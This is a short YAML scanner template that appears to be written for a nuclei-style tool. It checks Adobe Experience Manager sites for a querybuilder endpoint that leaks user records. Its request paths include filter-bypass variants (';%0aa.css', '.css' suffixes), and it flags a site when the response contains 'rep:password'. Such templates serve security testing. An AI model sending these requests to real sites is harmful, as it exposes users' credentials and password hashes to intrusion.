id: aem-querybuilder-secret-leak
info:
  name: AEM Querybuilder Secret Leak
  risk: High

params:
  - root: "{{.BaseURL}}"

variables:
  - endpoint: |
      /bin/querybuilder.json?p.hits=full&property=rep:authorizableId&type=rep:User
      /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User
      /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
      /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
      /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
      /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.endpoint}}
    headers:
      - User-Agent: curl/123
      - Referer: '{{.root}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "jcr:primaryType") && StringSearch("response", "rep:password")
